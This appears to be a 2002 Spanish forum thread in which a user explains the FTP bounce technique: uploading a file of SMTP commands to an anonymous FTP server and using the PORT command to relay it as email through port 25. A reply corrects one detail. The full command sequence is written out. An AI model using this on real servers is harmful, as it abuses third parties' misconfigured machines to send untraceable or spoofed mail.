Foros del Web » Administración de Sistemas » Seguridad y redes »

Envio de mails mediante FTP (para raac)

Estas en el tema de Envio de mails mediante FTP (para raac) en el foro de Seguridad y redes en Foros del Web. Explicaré aquí la menara de enviar correo mediante FTP por sugerencia/pregunta de mi amigo raac . Se trata de usar el protocolo FTP para enviar ...
  #1 (permalink)  
Antiguo 21/04/2002, 15:16
Avatar de Alfon
Colaborador
 
Fecha de Ingreso: octubre-2000
Mensajes: 1.976
Antigüedad: 23 años, 6 meses
Puntos: 14
Envio de mails mediante FTP (para raac)

Explicaré aquí la menara de enviar correo mediante FTP por sugerencia/pregunta de mi amigo raac .

Se trata de usar el protocolo FTP para enviar un correo explotando una vulnerabilidad ya antigua y mala configuración que todavía es muy común ver. La manera de usar FTP para envio de correo es indicarle al servidor ina IP distinta a la normal (21) y eviarle un archivo de texto plano con comandos SMTP. Para esp necesitaremos un servidor Fetepé que acepte conexiones anónimas (los hay a montones). Otro requisito es que acepte el envio de ficheros, osease, que tenga el servidor un directorio con los permisos adecuados, que tambíen los hay. Y el último esque acepte el comando PORT (este es más o menos la vilnerabilidad). Recordemos para que sirve el comando PORT: "Identifica una dirección de red y un puerto para que el servidor inicie una conexión de datos"

----------> Empezamos:

Escribimos primero el fichero TXT con los comandos SMTP como si estuvieramos en TELNET directamente.

----------------------------------

HELO usuario
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
Subject: Hola tronko, que tal estás
Pos nada que era para saludarte.
.
QUIT

---------------------------------------

Guardamos todo esto en un archivo TXT. Por ejemplo envio.txt

Ahora nos conectamos por Fetepé al servidor que hayamos visto que cumple las condiciones

-----------------------------------

FTP servidor.elegido
(respuesta del servidor)
USER anonymous
(respuesta del servidor)
PASS ***********
(varias respuestas del servidor)
CWD incoming
(respuesta del servidor)
STOR envio (este es el archivo .txt)
(respuesta del servidor)
PORT xxx.xxx.xx.xx,25 (IP del servidor y puerto)
(respuesta del servidor)
RETR envio
(respuesta del servidor)
QUIT

----------------------------------------

Y ya está enviado el correo.

Un saludo,
  #2 (permalink)  
Antiguo 21/04/2002, 16:35
 
Fecha de Ingreso: septiembre-2001
Mensajes: 552
Antigüedad: 22 años, 7 meses
Puntos: 0
Re: Envio de mails mediante FTP (para raac)

Hola Alfon

Me alegra que hayas publicado este mensaje.

Estoy probando la técnica después contaré los resultados. Sólo un detalle:

Cita:
La manera de usar FTP para envio de correo es indicarle al servidor ina IP distinta a la normal (21) y eviarle un archivo de texto plano con comandos SMTP.
Creo que no es una IP distinta, más bien un puerto distinto.

Y para los que deseen profundizar en está técnica los respectivos RFC a estudiar serían:

FTP: <a href='ir.asp?http://www.ietf.org/rfc/rfc959.txt' target='_blank'>http://www.ietf.org/rfc/rfc959.txt...</a>
SMTP: <a href='ir.asp?http://www.ietf.org/rfc/rfc0821.txt' target='_blank'>http://www.ietf.org/rfc/rfc0821.txt...</a>

Saludos Alfon y muchas gracias!

<div align="center"><a href="http://membres.lycos.fr/raac/"><img src="http://membres.lycos.fr/raac/Img/barra_raac.gif" width="400" height="20" border="0"></a></div>
  #3 (permalink)  
Antiguo 22/04/2002, 02:12
Avatar de Alfon
Colaborador
 
Fecha de Ingreso: octubre-2000
Mensajes: 1.976
Antigüedad: 23 años, 6 meses
Puntos: 14
Re: Envio de mails mediante FTP (para raac)

Ok raac, tienes razón. Hasta yo me equivoco a veces, jajaja.

Un saludo,
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:32.